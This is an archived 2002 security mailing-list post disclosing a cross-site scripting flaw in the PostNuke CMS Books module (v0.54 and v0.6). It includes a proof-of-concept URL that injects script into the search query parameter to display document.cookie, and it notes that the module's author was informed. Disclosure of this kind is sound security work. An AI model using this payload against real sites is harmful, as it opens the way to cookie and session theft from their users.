The Books Module for the PostNuke CMS XSS Vulnerability

From: Pistone (jorgepat_private)
Date: Wed Oct 02 2002 - 17:47:08 PDT

Next message: Frog Man: "phpMyNewsletter"

Previous message: David Endler: "iDEFENSE Security Advisory 10.03.2002: Apache 1.3.x shared memory scoreboard vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

- ----------------------------------------------------
Class :         input Validation Error

Risk :            Due to the simplicity of the attack and the number of sites
                   that run module books the risk is classified as Medium to  
                   High.

URL:             http://pn-mod-books.sourceforge.net
- ----------------------------------------------------
This Books module version v0.54 is running as a Mutant (PN 0.64) 
This Books module version v0.6  is running as a Rogue (PN 0.7)
- ----------------------------------------------------

Exploit:
       
http://servernuke/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|

Change | x <>


- -------------------------------------------------------
Programmer of Books module receives a copy this report.
- --------------------------------------------------------


Salu2

Pistone
- - --------
http://www.gauchohack.com.ar
http://www.hackindex.org

Next message: Frog Man: "phpMyNewsletter"
Previous message: David Endler: "iDEFENSE Security Advisory 10.03.2002: Apache 1.3.x shared memory scoreboard vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Oct 03 2002 - 20:42:58 PDT